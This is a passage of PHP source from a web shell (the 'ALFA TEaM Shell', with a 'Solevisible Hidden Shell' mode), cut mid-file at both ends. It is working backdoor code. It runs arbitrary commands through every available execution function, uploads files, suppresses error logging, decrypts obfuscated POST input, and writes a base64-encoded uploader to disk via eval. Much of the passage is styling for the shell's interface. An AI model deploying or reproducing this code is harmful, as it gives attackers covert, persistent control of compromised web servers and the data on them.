  561. }elseif($lang=="perl"){
  562. return _alfa_cgicmd($cmd_pure,"py");
  563. }elseif($lang=="py"){
  564. return _alfa_cgicmd($cmd_pure,"bash");
  565. }else{
  566. $_SESSION["alfacgiapi_mode"] = "off";
  567. }
  568. return trim($out);
  569. }else{
  570. return "";
  571. }
  572. }
  573. function alfaEx($in,$re=false,$cgi=true,$all=false){
  574. $data = _alfa_php_cmd($in,$re);
  575. if(empty($data)&&$cgi||$all){
  576. if($GLOBALS['sys']=='unix'){
  577. if(strlen(_alfa_php_cmd("whoami"))==0||$all){
  578. $cmd = _alfa_cgicmd($in);if(!empty($cmd)){
  579. return $cmd;
  580. }
  581. }
  582. }
  583. }
  584. return $data;
  585. }
  586. function _alfa_php_cmd($in,$re=false){
  587. $out='';
  588. try{
  589. if($re)$in=$in." 2>&1";
  590. if(function_exists('exec')){
  591. @exec($in,$out);
  592. $out = @join("\n",$out);
  593. }elseif(function_exists('passthru')) {
  594. ob_start();
  595. @passthru($in);
  596. $out = ob_get_clean();
  597. }elseif(function_exists('system')){
  598. ob_start();
  599. @system($in);
  600. $out = ob_get_clean();
  601. } elseif (function_exists('shell_exec')) {
  602. $out = shell_exec($in);
  603. }elseif(function_exists("popen")&&function_exists("pclose")){
  604. if(is_resource($f = @popen($in,"r"))){
  605. $out = "";
  606. while(!@feof($f))
  607. $out .= fread($f,1024);
  608. pclose($f);
  609. }
  610. }elseif(function_exists('proc_open')){
  611. $pipes = array();
  612. $process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
  613. $out=@stream_get_contents($pipes[1]);
  614. }elseif(class_exists('COM')){
  615. $alfaWs = new COM('WScript.shell');
  616. $exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
  617. $stdout = $exec->StdOut();
  618. $out=$stdout->ReadAll();
  619. }
  620. }catch(Exception $e){}
  621. return $out;
  622. }
  623. function _alfa_fsockopen($server,$uri,$post){
  624. $socket = @fsockopen($server, 80, $errno, $errstr, 15);
  625. if($socket){
  626. $http = "POST {$uri} HTTP/1.0\r\n";
  627. $http .= "Host: {$server}\r\n";
  628. $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
  629. $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
  630. $http .= "Content-length: " . strlen($post) . "\r\n";
  631. $http .= "Connection: close\r\n\r\n";
  632. $http .= $post . "\r\n\r\n";
  633. fwrite($socket, $http);
  634. $contents = "";
  635. while (!@feof($socket)) {
  636. $contents .= @fgets($socket, 4096);
  637. }
  638. list($header, $body) = explode("\r\n\r\n", $contents, 2);
  639. @fclose($socket);
  640. return $body;
  641. }else{
  642. return "";
  643. }
  644. }
  645. if(isset($_GET["solevisible"])){
  646. @error_reporting(E_ALL ^ E_NOTICE);
  647. echo '<html>';
  648. echo "<title>Solevisible Hidden Shell</title>";
  649. echo "<body bgcolor=#000000>";
  650. echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
  651. $safe_mode = @ini_get('safe_mode');
  652. if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}
  653. echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
  654. echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
  655. echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";
  656. echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@getcwd()) . "/<br />";
  657. echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
  658. echo"<font color=#7CFC00>Disable functions : </font>";
  659. $disfun = @ini_get('disable_functions');
  660. if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}
  661. echo"<font color=red>";
  662. echo "$disfun";
  663. echo"</font><br>";
  664. echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
  665. echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
  666. echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  667. echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@getcwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
  668. if(isset($_FILES['file'])){
  669. if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }
  670. else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }
  671. }
  672. echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
  673. <hr><pre>';
  674. if(isset($_POST['command_solevisible'])){
  675. if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
  676. $solevisible = "cd '".addslashes(str_replace("\\","/",@getcwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
  677. echo alfaEx($solevisible);
  678. }
  679. echo'</pre>
  680. </body></html>';
  681. exit;}
  682. @error_reporting(E_ALL ^ E_NOTICE);
  683. @ini_set('error_log',NULL);
  684. @ini_set('log_errors',0);
  685. @ini_set('max_execution_time',0);
  686. @ini_set('magic_quotes_runtime', 0);
  687. @set_time_limit(0);
  688. if(function_exists('set_magic_quotes_runtime')){
  689. @set_magic_quotes_runtime(0);
  690. }
  691. foreach($_POST as $key => $value){
  692. if(is_array($_POST[$key])){
  693. $i=0;
  694. foreach($_POST[$key] as $f) {
  695. $f = trim(str_replace(' ', '+',$f));
  696. $_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey());
  697. $i++;
  698. }
  699. }else{
  700. $value = trim(str_replace(' ', '+',$value));
  701. $_POST[$key] = decrypt_post($value, _AlfaSecretKey());
  702. }
  703. }
  704. $default_action = 'FilesMan';
  705. $default_use_ajax = true;
  706. $default_charset = 'Windows-1251';
  707. if(strtolower(substr(PHP_OS,0,3))=="win")
  708. $GLOBALS['sys']='win';
  709. else
  710. $GLOBALS['sys']='unix';
  711. $GLOBALS['home_cwd'] = @getcwd();
  712. if($_POST["a"] != "GetPathHistory"){
  713. if($_SESSION[__LAST_CWD__]!=$_POST['c']){
  714. $_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];
  715. }
  716. }
  717. $GLOBALS["need_to_update_header"] = "false";
  718. if(isset($_POST['c'])){
  719. if(!@chdir($_POST['c'])){
  720. $GLOBALS['glob_chdir_false'] = true;
  721. }
  722. }
  723. $GLOBALS['cwd'] = (isset($_SESSION[__LAST_CWD__])&&$_SESSION[__LAST_CWD__]!=''&&!isset($_POST['c'])?$_SESSION[__LAST_CWD__]:@getcwd());
  724. if(!@is_dir){$GLOBALS['cwd'] = @getcwd();}
  725. if($GLOBALS['sys'] == 'win'){
  726. $GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
  727. $GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
  728. $_SESSION[__PATH_HISTORY__] = str_replace("\\", "/", $_SESSION[__PATH_HISTORY__]);
  729. }
  730. if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
  731. function alfaGetPathHistory(){echo (isset($_SESSION[__PATH_HISTORY__])&&!empty($_SESSION[__PATH_HISTORY__])?$_SESSION[__PATH_HISTORY__]: $GLOBALS['home_cwd']);}
  732. function alfahead(){
  733. if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
  734. $GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
  735. $alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
  736. define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
  737. define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
  738. if(!isset($_POST['ajax'])){
  739. function Alfa_GetDisable_Function(){
  740. $disfun = @ini_get('disable_functions');
  741. $afa = '<span class="header_show_all">All Functions Accessible</span>';
  742. if(empty($disfun))return($afa);
  743. $s = explode(',',$disfun);
  744. $s = array_unique($s);
  745. $i=0;
  746. $b=0;
  747. $func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
  748. $black_list = array();
  749. $allow_list = array();
  750. foreach($s as $d){
  751. $d=trim($d);
  752. if(empty($d)||!is_callable($d))continue;
  753. if(!function_exists($d)){
  754. if(in_array($d,$func)){
  755. $dis .= $d." | ";$b++;
  756. $black_list[] = $d;
  757. }else{
  758. $allow_list[] = $d;
  759. }
  760. $i++;
  761. }
  762. }
  763. if($i==0)return($afa);
  764. if($i <= count($func)){
  765. $all = array_values(array_merge($black_list, $allow_list));
  766. return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
  767. }
  768. return('<span class="disable_functions">'.$dis.'</span><a href=javascript:void(0) onclick="g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
  769. }
  770. function AlfaNum(){
  771. $args = func_get_args();
  772. $alfax = array();
  773. $find = array();
  774. for($i=1;$i<=10;$i++){
  775. $alfax[] = $i;
  776. }
  777. foreach($args as $arg){
  778. $find[] = $arg;
  779. }
  780. echo '<script>';
  781. foreach($alfax as $alfa){
  782. if(in_array($alfa,$find))
  783. continue;
  784. echo 'alfa'.$alfa."_=";
  785. }
  786. echo '""</script>';
  787. }
  788. if(empty($_POST['charset']))
  789. $_POST['charset'] = $GLOBALS['default_charset'];
  790. $freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
  791. $totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
  792. $totalSpace = $totalSpace?$totalSpace:1;
  793. $on="<span class='header_on'> ON </span>";
  794. $of="<span class='header_off'> OFF </span>";
  795. $none="<span class='header_none'> NONE </span>";
  796. if(function_exists('ssh2_connect'))
  797. $ssh2=$on;
  798. else
  799. $ssh2=$of;
  800. if(function_exists('curl_version'))
  801. $curl=$on;
  802. else
  803. $curl=$of;
  804. if(function_exists('mysql_get_client_info'))
  805. $mysql=$on;
  806. else
  807. $mysql=$of;
  808. if(function_exists('mssql_connect'))
  809. $mssql=$on;
  810. else
  811. $mssql=$of;
  812. if(function_exists('pg_connect'))
  813. $pg=$on;
  814. else
  815. $pg=$of;
  816. if(function_exists('oci_connect'))
  817. $or=$on;
  818. else
  819. $or=$of;
  820. if(@ini_get('disable_functions'))
  821. $disfun=@ini_get('disable_functions');
  822. else
  823. $disfun="All Functions Enable";
  824. if(@ini_get('safe_mode'))
  825. $safe_modes="<span class='header_off'>ON</span>";
  826. else
  827. $safe_modes="<span class='header_on'>OFF</span>";
  828. $cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
  829. if(@ini_get('open_basedir')){
  830. $basedir_data = @ini_get('open_basedir');
  831. if(strlen($basedir_data)>120){
  832. $open_b=substr($basedir_data,0, 120)."...";
  833. }else{
  834. $open_b = $basedir_data;
  835. }
  836. }else{$open_b=$none;}
  837. if(@ini_get('safe_mode_exec_dir'))
  838. $safe_exe=@ini_get('safe_mode_exec_dir');
  839. else
  840. $safe_exe=$none;
  841. if(@ini_get('safe_mode_include_dir'))
  842. $safe_include=@ini_get('safe_mode_include_dir');
  843. else
  844. $safe_include=$none;
  845. if(!function_exists('posix_getegid'))
  846. {
  847. $user = function_exists("get_current_user")?@get_current_user():"????";
  848. $uid = function_exists("getmyuid")?@getmyuid():"????";
  849. $gid = function_exists("getmygid")?@getmygid():"????";
  850. $group = "?";
  851. }else{
  852. $uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
  853. $gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
  854. $user = $uid['name'];
  855. $uid = $uid['uid'];
  856. $group = $gid['name'];
  857. $gid = $gid['gid'];
  858. }
  859. $cwd_links = '';
  860. $path = explode("/", $GLOBALS['cwd']);
  861. $n=count($path);
  862. for($i=0; $i<$n-1; $i++) {
  863. $cwd_links .= "<a class='header_pwd' href='javascript:void(0);' onclick='g(\"FilesMan\",\"";
  864. for($j=0; $j<=$i; $j++)
  865. $cwd_links .= $path[$j].'/';
  866. $cwd_links .= "\")'>".$path[$i]."/</a>";
  867. }
  868. $drives = "";
  869. foreach(range('a','z') as $drive)
  870. if(@is_dir($drive.':\\'))
  871. $drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  872. $csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
  873. echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  874. <html xmlns="http://www.w3.org/1999/xhtml">
  875. <head>
  876. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  877. <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
  878. <link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
  879. <title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.' ::..</title>
  880. <link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet">
  881. <style type="text/css">
  882. .hlabale {
  883. color: #daf50c;
  884. border-radius: 4px;
  885. border: 1px solid #27979B;
  886. margin-left: 7px;
  887. padding: 2px;
  888. }
  889. #tbl_sympphp tr {
  890. text-align: center;
  891. }
  892. .editor-view {
  893. position: relative;
  894. }
  895. .view-content {
  896. position: absolute;
  897. overflow-y: auto;
  898. width: 100%;
  899. height: 475px;
  900. }
  901. *::-webkit-scrollbar-track {
  902. -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
  903. border-radius: 10px;
  904. background-color: #000115;
  905. }
  906. *::-webkit-scrollbar{
  907. width: 10px;
  908. background-color: #000115;
  909. }
  910. *::-webkit-scrollbar-thumb {
  911. border-radius: 10px;
  912. -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
  913. background-color: rgb(30, 130, 181);
  914. }
  915. .editor-file-name {
  916. margin-left: 29px;
  917. margin-top: 4px;
  918. overflow: hidden;
  919. text-overflow: ellipsis;
  920. white-space: nowrap;
  921. }
  922. .editor-icon {
  923. position: absolute;
  924. }
  925. .is_active {
  926. background: rgba(49, 55, 93, 0.77);
  927. border-radius: 10px;
  928. }
  929. .history-list {
  930. height: 88%;
  931. overflow-y: auto;
  932. }
  933. #editor-minimized,#cgiloader-minimized {
  934. display: block;
  935. position: fixed;
  936. right: -30px;
  937. width: 30px;
  938. height: 30px;
  939. top: 30%;
  940. }
  941. .minimized-wrapper {
  942. position: relative;
  943. background: rgb(14, 48, 74);
  944. width: 44px;
  945. height: 167px;
  946. cursor: pointer;
  947. border-bottom-left-radius: 5px;
  948. border-top-left-radius: 5px;
  949. }
  950. .minimized-text {
  951. transform: rotate(-90deg);
  952. color: wheat;
  953. font-size: x-large;
  954. display: inline-block;
  955. position: absolute;
  956. right: -51px;
  957. width: 129px;
  958. top: 50px;
  959. border-top-left-radius: 4%;
  960. height: 56px;
  961. padding: 3px
  962. }
  963. .close-button,.editor-minimize {
  964. height: 26px;
  965. width: 38px;
  966. right: 7px;
  967. background: rgb(29, 86, 115);
  968. cursor: pointer;
  969. position: absolute;
  970. box-sizing: border-box;
  971. line-height: 50px;
  972. display: inline-block;
  973. top: 17px;
  974. border-radius: 100px;
  975. }
  976. .editor-minimize {right: 50px;}
  977. .close-button:before,.close-button:after,.editor-minimize:before {
  978. transform: rotate(-45deg);
  979. content: "";
  980. position: absolute;
  981. top: 63%;
  982. right: 6px;
  983. margin-top: -5px;
  984. margin-left: -25px;
  985. display: block;
  986. height: 4px;
  987. width: 27px;
  988. background-color: rgba(216, 207, 207, 0.75);
  989. transition: all 0.25s ease-out;
  990. }
  991. .editor-minimize:before{
  992. transform: rotate(0deg);
  993. }
  994. .close-button:after {
  995. transform: rotate(-135deg);
  996. }
  997. .close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{
  998. background-color: red;
  999. }
  1000. .close-button:hover,.editor-minimize:hover{
  1001. background-color: rgba(39, 66, 80, 0.96);
  1002. }
  1003. #editor,#cgiloader {
  1004. display: none;
  1005. position: fixed;
  1006. top: 0;
  1007. width: 100%;
  1008. height: 100%;
  1009. }
  1010. .editor-wrapper {
  1011. width: 100%;
  1012. height: 100%;
  1013. position: relative;
  1014. top: 1%;
  1015. }
  1016. .editor-header {
  1017. width: 97%;
  1018. background: rgba(21, 66, 88, 0.93);
  1019. height: 37px;
  1020. margin-left: 13px;
  1021. position: relative;
  1022. border-top-left-radius: 15px;
  1023. border-top-right-radius: 15px;
  1024. }
  1025. .editor-path {
  1026. position: absolute;
  1027. font-size: x-large;
  1028. margin-left: 10px;
  1029. top: 6px;
  1030. color: springgreen;
  1031. }
  1032. .editor-modal {
  1033. position: relative;
  1034. top: 0;
  1035. background-color: rgba(0, 1, 23, 0.95);
  1036. height: 90%;
  1037. margin-left: 20%;
  1038. margin-right: 2%;
  1039. border: 2px #0e304a solid;
  1040. }
  1041. .editor-explorer {
  1042. width: 19%;
  1043. height: 90%;
  1044. background-color: rgba(0, 1, 23, 0.94);
  1045. position: absolute;
  1046. z-index: 2;
  1047. left: 1%;
  1048. border: 2px rgb(14, 48, 74) solid;
  1049. }
  1050. .editor-controller {
  1051. position: relative;
  1052. top: -13px;
  1053. }
  1054. .file-holder {
  1055. position: relative;
  1056. width: 100%;
  1057. height: 30px;
  1058. }
  1059. .file-holder > .history {
  1060. position: absolute;
  1061. color: rgb(3, 179, 163);
  1062. cursor: pointer;
  1063. left:5px;
  1064. font-size: 18px;
  1065. font-family: sans-serif;
  1066. width:89%;
  1067. height:100%;
  1068. z-index: 3;
  1069. border-radius: 10px;
  1070. transition: background-color 600ms ease-out;
  1071. }
  1072. .file-holder > .history-close {
  1073. display: block;
  1074. opacity: 0;
  1075. position: absolute;
  1076. right: 2px;
  1077. width: 20px;
  1078. top: 4px;
  1079. text-align: center;
  1080. cursor: pointer;
  1081. color: white;
  1082. background: red;
  1083. border-radius: 100px;
  1084. font-family: monospace;
  1085. z-index: 10;
  1086. transition: opacity 600ms ease-out;
  1087. font-size: 15px;
  1088. height: 19px;
  1089. }
  1090. .file-holder > .history:hover {
  1091. background-color: #646464;
  1092. }
  1093. .editor-explorer > .hheader {
  1094. position: relative;
  1095. color: rgb(20, 255, 7);
  1096. border-bottom: 2px rgb(32, 106, 162) solid;
  1097. text-align: center;
  1098. font-family: sans-serif;
  1099. margin-bottom: 10px;
  1100. height: 55px;
  1101. }
  1102. .editor-search {
  1103. position: absolute;
  1104. bottom: 7px;
  1105. left: 31px;
  1106. }
  1107. .hheader-text {
  1108. position: absolute;
  1109. left: 8px;
  1110. top: 2px;
  1111. }
  1112. .history-clear {
  1113. position: absolute;
  1114. right: 8px;
  1115. top: 2px;
  1116. cursor: pointer;
  1117. }
  1118. .editor-body {
  1119. position: relative;
  1120. margin-left: 3px;
  1121. }
  1122. .editor-anim-close {
  1123. '.showAnimation("editorClose").'
  1124. }
  1125. @keyframes editorClose {
  1126. 0% {
  1127. transform: scale(1);
  1128. opacity: 1;
  1129. }
  1130. 100% {
  1131. transform: scale(0);
  1132. opacity: 0;
  1133. }
  1134. }
  1135. .editor-anim-minimize {
  1136. '.showAnimation("editorMinimize").'
  1137. }
  1138. @keyframes editorMinimize {
  1139. 0% {
  1140. right:0px;
  1141. opacity: 1;
  1142. }
  1143. 100% {
  1144. right: -2000px;
  1145. opacity: 0;
  1146. }
  1147. }
  1148. .editor-anim-show {
  1149. '.showAnimation("editorShow").'
  1150. }
  1151. @keyframes editorShow {
  1152. 0% {
  1153. right:-2000px;
  1154. opacity: 0;
  1155. }
  1156. 100% {
  1157. right: 0px;
  1158. opacity: 1;
  1159. }
  1160. }
  1161. .minimized-show {
  1162. '.showAnimation("minimizeShow").'
  1163. }
  1164. @keyframes minimizeShow {
  1165. 0% {
  1166. right: -30px;
  1167. opacity: 0;
  1168. }
  1169. 100% {
  1170. right: 0px;
  1171. opacity: 1;
  1172. }
  1173. }
  1174. .minimized-hide {
  1175. '.showAnimation("minimizeHide").'
  1176. }
  1177. @keyframes minimizeHide {
  1178. 0% {
  1179. right: 0px;
  1180. opacity: 1;
  1181. }
  1182. 100% {
  1183. right: -30px;
  1184. opacity: 0;
  1185. }
  1186. }
  1187. .solevisible-text:hover {
  1188. -webkit-text-shadow: 0px 0px 25px #00FF00;
  1189. -moz-text-shadow: 0px 0px 25px #00FF00;
  1190. -ms-text-shadow: 0px 0px 25px #00FF00;
  1191. text-shadow: 0px 0px 25px #00FF00;
  1192. }
  1193. .update-holder {
  1194. position: fixed;
  1195. top: 0;
  1196. background-color: rgba(0, 24, 29, 0.72);
  1197. width: 100%;
  1198. height: 100%;
  1199. }
  1200. .update-partner {
  1201. width: 50%;
  1202. position: relative;
  1203. border-radius: 31px;
  1204. height: 200px;
  1205. background-color: rgba(3, 3, 41, 0.47);
  1206. text-align: center;
  1207. color: rgba(252, 253, 251, 0.88);
  1208. margin-left: 25%;
  1209. top: 23%;
  1210. font-family: "Francois One", sans-serif;
  1211. }
  1212. .update-partner:hover {
  1213. -webkit-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
  1214. -moz-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
  1215. box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
  1216. }
  1217. .update-content {
  1218. position: relative;
  1219. }
  1220. .update-content > a {
  1221. text-decoration: none;
  1222. position: absolute;
  1223. color: rgba(103, 167, 47, 0.77);
  1224. left: 24%;
  1225. margin-top: 7%;
  1226. font-size: 40px;
  1227. font-family: "Francois One", sans-serif;
  1228. }
  1229. .update-close {
  1230. position: absolute;
  1231. right: 0;
  1232. margin-right: 23px;
  1233. top: 10px;
  1234. font-size: 27px;
  1235. background-color: #130f50;
  1236. width: 5%;
  1237. border-radius: 100px;
  1238. cursor: pointer;
  1239. border: 2px rgb(14, 38, 90) solid;
  1240. }
  1241. .update-close:hover {
  1242. border: 2px #25ff00 solid;
  1243. color: #FF0000;
  1244. }
  1245. .filestools {
  1246. height: auto;
  1247. width: auto;
  1248. color: #daf50c;
  1249. font-size: 12px;
  1250. font-family: Verdana,Geneva,sans-serif;
  1251. }
  1252. @-moz-document url-prefix() {
  1253. #search-input {
  1254. width: 173px;
  1255. }
  1256. .editor-path {
  1257. top:3px;
  1258. }
  1259. }
  1260. @keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
  1261. @-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
  1262. @-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
  1263. @-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
  1264. #alfaloader{'.$csscode.'width:100px;height:100px;}
  1265. #a_loader{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}
  1266. .ajaxarea{border:1px solid #801818;color:#daf50c}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#801818;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(https://kelas.daqu.sch.id/theme/classic/templates/core/temletscalisc.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #801818;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#4d16ba}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #801818;background:transparent;box-shadow:0 0 4px #801818;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile 